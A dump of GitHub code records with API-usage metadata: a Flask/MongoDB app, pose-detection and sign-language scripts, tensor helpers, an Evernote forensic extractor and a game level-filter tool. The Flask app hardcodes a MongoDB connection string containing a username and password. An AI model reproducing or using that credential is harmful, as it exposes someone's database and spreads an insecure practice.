"torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "40892905194", "text": "#################################################\n# Dependencies\n#################################################\nimport pandas as pd\nfrom flask import Flask, jsonify, render_template, redirect, url_for\nimport pymongo\nimport json\n\n#################################################\n# Helper Functions\n#################################################\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Database Setup\n#################################################\n# Set up Mongo/PyMongo\nconn = \"mongodb://heroku_2rsv5d25:iktn3mgtq8k4qluqgmlhug6kp6@ds233228.mlab.com:33228/heroku_2rsv5d25\"\nclient = pymongo.MongoClient(conn,\n connectTimeoutMS=30000,\n socketTimeoutMS=None,\n socketKeepAlive=True)\n\n# Map Database\ndb = client.heroku_2rsv5d25\n\n# Map collection (Table)\nveilofignorance = db.veilofignorance\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef home():\n print(\"Server received request for 'Home' page...\")\n return render_template(\"index.html\")\n\n# API\n@app.route(\"/api/veilofignorance\")\ndef allStates():\n data = db.veilofignorance.find()\n print(type(data))\n allStates = list(data)\n for state in data:\n allStates.append(state)\n # remove _id\n for state in allStates:\n state.pop(\"_id\")\n\n return jsonify(allStates)\n\n# About\n@app.route(\"/about\")\ndef about():\n print(\"Server received request for 'About' page...\")\n return render_template(\"about.html\")\n\n# User-friendly API\n@app.route(\"/api\")\ndef api():\n print(\"Server received request for 'API' page...\")\n return render_template(\"api.html\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n", "repo_name": "cbt8/veil_of_ignorance", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1910, "program_lang": "python", "lang": "de", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "33494183994", "text": "import cv2\nfrom ultralytics import YOLO\nimport numpy as np\n\n# Load Model\npose_model = YOLO(\"yolov8s-pose.pt\")\n\n# Keypoint names\nkeypoint_names = [\n \"nose\",\n \"left_eye\",\n \"right_eye\",\n \"left_ear\",\n \"right_ear\",\n \"left_shoulder\",\n \"right_shoulder\",\n \"left_elbow\",\n \"right_elbow\",\n \"left_wrist\",\n \"right_wrist\",\n \"left_hip\",\n \"right_hip\",\n \"left_knee\",\n \"right_knee\",\n \"left_ankle\",\n \"right_ankle\",\n]\n\n# Open the webcam\ncap = cv2.VideoCapture(1)\n\nwhile cap.isOpened():\n success, frame = cap.read()\n\n if success:\n # Pose detection\n pose_results = pose_model(frame, verbose=False, conf=0.5)\n\n # Print each body coordinate as a dictionary\n for person in pose_results:\n keypoints = person.keypoints.data[0]\n for keypoint, name in zip(keypoints, keypoint_names):\n x, y, probability = keypoint\n print(\n {\n \"keypoint\": name,\n \"x\": x.item(),\n \"y\": y.item(),\n \"probability\": probability.item(),\n }\n )\n\n pose_annotated_frame = person.plot()\n cv2.imshow(\"Pose Detection\", pose_annotated_frame)\n\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n else:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "JakeAum/PushupPy", "sub_path": "pose_testing.py", "file_name": "pose_testing.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ultralytics.YOLO", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "10210923962", "text": "\"\"\"\nGeneric type & functions for torch.Tensor and np.ndarray\n\"\"\"\n\nimport torch\nfrom torch import Tensor\n\nimport numpy as np\nfrom numpy import ndarray\n\nfrom typing import Tuple, Union, List, TypeVar\n\n\nTensArr = TypeVar('TensArr', Tensor, ndarray)\n\n\ndef convert(a: TensArr, astype: type) -> TensArr:\n if astype == Tensor:\n if type(a) == Tensor:\n return a\n else:\n return torch.tensor(a, dtype=torch.float32)\n elif astype == ndarray:\n if type(a) == Tensor:\n return a.numpy()\n else:\n return a\n else:\n raise ValueError(astype)\n\n\ndef shape(a: TensArr) -> Tuple[int, ...]:\n if type(a) == Tensor:\n return tuple(a.size())\n elif type(a) == ndarray:\n return a.shape\n else:\n raise TypeError\n\n\ndef ndim(a: TensArr) -> int:\n if type(a) == Tensor:\n return a.dim()\n elif type(a) == ndarray:\n return a.ndim\n else:\n raise TypeError\n\n\ndef transpose(a: TensArr,\n axes: Union[int, Tuple[int, ...], List[int]]=None) -> TensArr:\n if type(a) == Tensor:\n if not axes:\n if a.dim() >= 2:\n return a.permute((1, 0)+(-1,)*(a.dim()-2))\n else:\n return a\n else:\n return a.permute(axes)\n\n elif type(a) == ndarray:\n if a.ndim == 1 and not axes:\n return a\n else:\n return a.transpose(axes)\n else:\n raise TypeError\n\n\ndef squeeze(a: TensArr, axis=None) -> int:\n if type(a) == Tensor:\n return a.squeeze(dim=axis)\n elif type(a) == ndarray:\n return a.squeeze(axis=axis)\n else:\n raise TypeError\n\n\ndef _cat_stack(fn: str,\n a: Union[Tuple[TensArr, ...], List[TensArr]],\n axis=0,\n astype: type=None) -> TensArr:\n fn_dict = {(torch, 'cat'): torch.cat,\n (np, 'cat'): np.concatenate,\n (torch, 'stack'): torch.stack,\n (np, 'stack'): np.stack,\n }\n\n types = [type(item) for item in a]\n if np.any(types != types[0]):\n a = [convert(item, (astype if astype else types[0])) for item in a]\n\n if types[0] == Tensor:\n result = fn_dict[(torch, fn)](a, dim=axis)\n elif types[0] == ndarray:\n result = fn_dict[(np, fn)](a, axis=axis)\n else:\n raise TypeError\n\n return convert(result, astype) if astype else result\n\n\ndef cat(*args, **kargs) -> TensArr:\n \"\"\"\n \n a:Union[Tuple[TensArr, ...], List[TensArr]]\n axis=0\n astype: type=None\n \"\"\"\n return _cat_stack('cat', *args, **kargs)\n\n\ndef stack(*args, **kargs) -> TensArr:\n \"\"\"\n \n a: Union[Tuple[TensArr, ...], List[TensArr]]\n axis=0\n astype: type=None\n \"\"\"\n return _cat_stack('stack', *args, **kargs)\n\n\ndef sum_axis(a: TensArr, axis=None):\n if axis:\n if type(a) == Tensor:\n return a.sum(dim=axis)\n elif type(a) == ndarray:\n return a.sum(axis=axis)\n else:\n raise TypeError\n else:\n return a.sum()\n", "repo_name": "WXB506/De-reverberation", "sub_path": "generic.py", "file_name": "generic.py", "file_ext": "py", "file_size_in_byte": 3076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.TypeVar", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 14, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 14, "usage_type": "argument"}, {"api_name": "torch.Tensor", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 24, 
"usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.stack", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.stack", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.any", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 95, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 125, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 127, "usage_type": "name"}]}
+{"seq_id": "19143924384", "text": "import os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport cv2\nimport mediapipe as mp\nimport torch\nfrom model import SimpleCNN, load_model, min_max_scale\nimport numpy as np\n\nmodel = SimpleCNN(26)\nmodel = load_model(model)\nmodel.eval()\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\nmapper = {0: 'a',\n 1: 'b',\n 2: 'c',\n 3: 'd',\n 4: 'e',\n 5: 'f',\n 6: 'g',\n 7: 'h',\n 8: 'i',\n 9: 'j',\n 10: 'k',\n 11: 'l',\n 12: 'm',\n 13: 'n',\n 14: 'o',\n 15: 'p',\n 16: 'q',\n 17: 'r',\n 18: 's',\n 19: 't',\n 20: 'u',\n 21: 'v',\n 22: 'w',\n 23: 'x',\n 24: 'y',\n 25: 'z'}\n\ncap = cv2.VideoCapture(0)\n_, frame = cap.read()\nh, w, c = frame.shape\n\nwhile True:\n _, frame = cap.read()\n\n k = cv2.waitKey(1)\n if k % 256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n\n framergb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n result = hands.process(framergb)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n new_hande = []\n # print(handLMs)\n X_arr = []\n Y_arr = []\n Z_arr = []\n for hl in handLMs.landmark:\n X_arr.append(hl.x)\n Y_arr.append(hl.y)\n Z_arr.append(hl.z)\n # new_hande.append(hl.x)\n # new_hande.append(hl.y)\n # new_hande.append(hl.z)\n X_arr = min_max_scale(X_arr)\n Y_arr = min_max_scale(Y_arr)\n Z_arr = min_max_scale(Z_arr)\n\n for i in range(len(X_arr)):\n new_hande.append(X_arr[i])\n new_hande.append(Y_arr[i])\n new_hande.append(Z_arr[i])\n\n new_hande = np.array(new_hande)\n sign_data = torch.Tensor(new_hande.reshape(1, 21, 3).astype(float))\n sign_data = torch.unsqueeze(sign_data, 0)\n output = model(sign_data)\n _, preds = torch.max(output.data, 1)\n print(mapper[preds.item()])\n cv2.imshow(\"Frame\", frame)\n\ncap.release()\ncv2.destroyAllWindows()\n", "repo_name": "YuriyPukhta/Sign-Language-recognition", "sub_path": "test_hand_lendmarks/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "model.SimpleCNN", "line_number": 11, "usage_type": "call"}, {"api_name": "model.load_model", "line_number": 12, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 13, "usage_type": "call"}, {"api_name": "mediapipe.solutions", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 57, "usage_type": "attribute"}, {"api_name": "model.min_max_scale", "line_number": 74, "usage_type": "call"}, {"api_name": "model.min_max_scale", "line_number": 75, "usage_type": "call"}, {"api_name": "model.min_max_scale", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 92, "usage_type": 
"call"}]}
+{"seq_id": "73475231208", "text": "import sqlite3\nimport os\nimport shutil\nfrom random import randrange\n\n__maintainer__ = \"Yassine Abdelouahed \"\n__date__ = '18.08.2020'\n__revision__ = 'version 1'\n\ndef normalize_filename(fn):\n valid_chars = \"-_.()\"\n out = \"\"\n for c in fn:\n if str.isalpha(c) or str.isdigit(c) or (c in valid_chars):\n out += c\n else:\n out += \"_\"\n return out\n\n\ndef read_db(table, id=\"\"):\n conn = sqlite3.connect(DATABASE_PATH)\n # create a coursor\n c = conn.cursor()\n # print(\"Start reading\")\n if table == \"notebooks\":\n c.execute(\"SELECT guid, name, stack FROM notebooks ORDER BY stack\")\n elif table == \"notes\":\n query = \"SELECT guid, title FROM notes WHERE notebook_guid=\\'\" + id + \"\\'\"\n c.execute(query)\n else:\n c.execute(\"SELECT guid, name, stack FROM notes\")\n\n return c.fetchall()\n\n\ndef create_folder(parent_dir, dir):\n path = os.path.join(parent_dir, dir)\n if not os.path.exists(path):\n os.mkdir(path)\n\n\ndef copy_files(src, dest, note_title, folder_name):\n # \"normalizing\" the folder name so that it contains only allowed characters\n new_note_title = normalize_filename(str(note_title))\n\n # Verhindern das Problem, wenn Notizen der gleiche Titel haben\n while os.path.exists(os.path.join(dest, new_note_title)):\n new_note_title += \"_R\" + str(randrange(1000))\n\n # set the new folder name according to the note title\n dest_folder = os.path.join(dest, new_note_title)\n create_folder(dest, new_note_title)\n\n src_files = os.listdir(src)\n for file_name in src_files:\n full_file_name = os.path.join(src, file_name)\n if os.path.isfile(full_file_name):\n shutil.copy(full_file_name, dest_folder)\n extension = os.path.splitext(full_file_name)[1]\n # filter the files according the extension\n if extension == \".enml\":\n source = os.path.join(dest_folder, full_file_name.split('\\\\')[-1])\n destination = os.path.splitext(source)[0] + \".html\"\n shutil.move(source, destination)\n # Editing the content of the HTML File => \"en-media hash\" to \"img src\"\n edit_html(destination)\n elif extension == \".dat\":\n source = os.path.join(dest_folder, full_file_name.split('\\\\')[-1])\n destination = os.path.splitext(source)[0]\n shutil.move(source, destination)\n\n\n# adjust the html file\ndef edit_html(source_file):\n # open the html file, adjust the substr \"en-media hash\" to \"img src\"\n with open(source_file, \"rt\", encoding=\"UTF-8\") as f:\n new_text = f.read().replace('en-media hash', 'img src')\n # save the changes to the file\n with open(source_file, \"wt\", encoding=\"UTF-8\") as f:\n f.write(new_text)\n\n\n# find the note directory with the help of the guid\ndef find_dir(name, path):\n # ignore the linked folder\n substr = \"linked\"\n for root, subdirs, files in os.walk(path):\n if substr in root:\n continue\n for d in subdirs:\n if d == name and substr not in d:\n return os.path.join(root, name)\n\n\ndef find_and_extract(dest_folder,notebook_name,notebook_id):\n # create notebook folder\n create_folder(dest_folder, normalize_filename(notebook_name))\n # remember the current notebook path\n notebook_path = os.path.join(dest_folder, normalize_filename(notebook_name))\n # read the database notes and filter the notes after the current notebook_guid\n notes_result = read_db(\"notes\", notebook_id)\n for note in notes_result:\n note_titel = note[1]\n note_id = note[0]\n # with the held of note_id find where the desired note_folder \"X\" lies\n folder_path = find_dir(note_id, source_path)\n if folder_path is None:\n 
continue\n copy_files(folder_path, notebook_path, note_titel, note_id)\n\nif __name__ == '__main__':\n # Directory\n directory = \"Evernote\"\n # the source path\n source_path = input(\"Please enter the source/package path of the evernote: \")\n # database path\n DATABASE_PATH = input(\"Please enter the database path(/com.evenote/databases/user...): \")\n # Parent Directory path\n parent_dir = input(\"Please enter where you want to save the results: \")\n\n # Create Results folder\n create_folder(parent_dir, directory)\n path = os.path.join(parent_dir, directory)\n\n # Read the notebook database\n results = read_db(\"notebooks\")\n\n # help variables\n current_stack = \"\"\n def_path = path\n current_path = path\n\n print(\"Starting the extraction\")\n # x steht für derzeitige Notebook von der Liste results\n for x in results:\n notebook_name = x[1]\n notebook_id = x[0]\n notebook_parent = x[2]\n\n # incase a notebook \"x[2]\" did't belong to a certain stack\n if notebook_parent is None:\n find_and_extract(def_path, notebook_name, notebook_id)\n continue\n\n # organise the stack\n if notebook_parent != current_stack:\n current_stack = normalize_filename(notebook_parent)\n # set the current path to the stack folder path\n current_path = os.path.join(def_path, current_stack)\n # create stack folder\n create_folder(def_path, current_stack)\n\n find_and_extract(current_path, notebook_name, notebook_id)\n\n\n\n input(\"Done, Press Enter to continue...\")\n", "repo_name": "yabdelouahed/Forensics-Tools", "sub_path": "Evernote - Android/evernote.py", "file_name": "evernote.py", "file_ext": "py", "file_size_in_byte": 5474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlite3.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 65, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 71, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}]}
+{"seq_id": "5695387678", "text": "\"\"\"Apply filters to a level or CustomObject.\"\"\"\n\n\nimport os\nimport sys\nimport argparse\nfrom contextlib import contextmanager\n\nfrom distance import DefaultClasses\nfrom distance.levelobjects import LevelObject\nfrom distance.filter import getfilter\nfrom distance.printing import PrintContext\n\n\nlevel_objects = DefaultClasses.level_objects\n\n\ndef filterlevel_getfilter(name):\n if name == 'file':\n return FileFilter\n return getfilter(name)\n\n\n@contextmanager\ndef optcontext(obj, func, *args, **kw):\n if obj is None:\n yield\n else:\n with getattr(obj, func)(*args, **kw) as o:\n yield o\n\n\ndef apply_filters(filters, content, p=None, **kw):\n if p:\n p(f\"Filters: {len(filters)}\")\n with optcontext(p, 'tree_children', count=len(filters)):\n for f in filters:\n if p:\n p.tree_next_child()\n p(f\"Filter: {f.__def_string}\")\n if not f.apply(content, p=p, **kw):\n return False\n return True\n\n\nclass FileFilter(object):\n\n @classmethod\n def add_args(cls, parser):\n parser.add_argument(\":src\", help=\"File containing the filter definitions.\")\n parser.add_argument(\":relative_to\", help=\"Path that src is relative to (used internally).\")\n parser.description = \"Load a filter chain from file.\"\n parser.epilog = \"\"\"\n Filter files consist any number of filters, one per line.\n Filters are formatted as per the -o/--of/--objfilter argument.\n Empty lines and lines starting with '#' are ignored.\n \"\"\"\n\n def __init__(self, args):\n src = args.src\n relative_to = args.__dict__.pop('relative_to', None) or '.'\n if not src.startswith('/'):\n src = os.path.join(relative_to, src)\n abssrc = os.path.abspath(src)\n self.src = os.path.relpath(src)\n\n def create(l):\n defaults = dict(relative_to=os.path.dirname(abssrc), **args.__dict__)\n return create_filter(l, defaults)\n\n with open(abssrc, 'r') as f:\n self.filters = [create(l) for l in map(str.strip, f)\n if l and not l.startswith('#')]\n self.aborted = False\n\n def apply(self, content, p=None, **kw):\n if p:\n p(f\"File: {self.src!r}\")\n apply_filters(self.filters, content, p=p)\n return True\n\n\ndef make_arglist(s):\n\n def iter_tokens(source):\n if not source:\n return\n token = []\n escape = False\n for char in source:\n if escape:\n escape = False\n token.append(char)\n elif char == '\\\\':\n escape = True\n elif char == ':':\n yield token\n token = []\n else:\n token.append(char)\n yield token\n\n return [\":\" + ''.join(token) for token in iter_tokens(s)]\n\n\ndef create_filter(option, defaults):\n name, sep, argstr = option.partition(':')\n cls = filterlevel_getfilter(name)\n\n parser = argparse.ArgumentParser(prog=name, prefix_chars=':',\n add_help=False)\n parser.add_argument(':help', action='help', default=argparse.SUPPRESS,\n help='show this help message and exit')\n parser.set_defaults(**defaults)\n cls.add_args(parser)\n args = parser.parse_args(make_arglist(argstr))\n\n flt = cls(args)\n flt.__def_string = option\n return flt\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=__doc__)\n parser.add_argument(\"-f\", \"--force\", action='store_true',\n help=\"Allow overwriting OUT file.\")\n parser.add_argument(\"-l\", \"--maxrecurse\", type=int, default=-1,\n help=\"Maximum recursion depth.\")\n parser.add_argument(\"-o\", \"--of\", \"--objfilter\", dest='objfilters',\n action='append', default=[],\n help=\"Specify a filter option.\")\n parser.add_argument(\"--list\", action='store_true',\n help=\"Dump result listing.\")\n parser.add_argument(\"IN\", 
nargs='?',\n help=\"Level .bytes filename.\")\n parser.add_argument(\"OUT\", nargs='?',\n help=\"output .bytes filename.\")\n args = parser.parse_args()\n\n defaults = dict(maxrecurse=args.maxrecurse)\n filters = [create_filter(f, defaults) for f in args.objfilters]\n\n if args.IN is None:\n print(f\"{parser.prog}: No input file specified.\", file=sys.stderr)\n return 1\n\n if args.OUT is None:\n print(f\"{parser.prog}: No output file specified.\", file=sys.stderr)\n return 1\n\n write_mode = 'xb'\n if args.force:\n write_mode = 'wb'\n elif args.OUT != '-' and os.path.exists(args.OUT):\n print(f\"{parser.prog}: file {args.OUT} exists.\"\n \" pass -f to force.\", file=sys.stderr)\n return 1\n\n if args.IN == '-':\n from io import BytesIO\n srcarg = BytesIO(sys.stdin.buffer.read())\n else:\n srcarg = args.IN\n content = DefaultClasses.level_like.read(srcarg)\n\n is_wrapped = False\n if isinstance(content, LevelObject) and content.type != 'Group':\n is_wrapped = True\n content = DefaultClasses.level_objects.create('Group', children=[content])\n\n p = PrintContext(file=sys.stderr, flags=('groups', 'subobjects'))\n\n if not apply_filters(filters, content, p=p):\n return 1\n\n if is_wrapped and len(content.children) == 1:\n content = content.children[0]\n\n if args.list:\n p.print_object(content)\n\n print(\"writing...\", file=sys.stderr)\n if args.OUT == '-':\n destarg = sys.stdout.buffer\n else:\n destarg = args.OUT\n n = content.write(destarg, write_mode=write_mode)\n print(f\"{n} bytes written\", file=sys.stderr)\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n\n\n# vim:set sw=4 ts=8 sts=4 et:\n", "repo_name": "ferreum/distanceutils", "sub_path": "distance_scripts/filterlevel.py", "file_name": "filterlevel.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "distance.DefaultClasses.level_objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 15, "usage_type": "name"}, {"api_name": "distance.filter.getfilter", "line_number": 21, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.relpath", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 110, "usage_type": "call"}, {"api_name": "argparse.SUPPRESS", "line_number": 112, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 124, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 157, "usage_type": "attribute"}, {"api_name": "io.BytesIO", "line_number": 162, "usage_type": "call"}, {"api_name": 
"sys.stdin.buffer.read", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 162, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses.level_like.read", "line_number": 165, "usage_type": "call"}, {"api_name": "distance.DefaultClasses.level_like", "line_number": 165, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 165, "usage_type": "name"}, {"api_name": "distance.levelobjects.LevelObject", "line_number": 168, "usage_type": "argument"}, {"api_name": "distance.DefaultClasses.level_objects.create", "line_number": 170, "usage_type": "call"}, {"api_name": "distance.DefaultClasses.level_objects", "line_number": 170, "usage_type": "attribute"}, {"api_name": "distance.DefaultClasses", "line_number": 170, "usage_type": "name"}, {"api_name": "distance.printing.PrintContext", "line_number": 172, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 172, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 183, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 185, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 189, "usage_type": "attribute"}]}
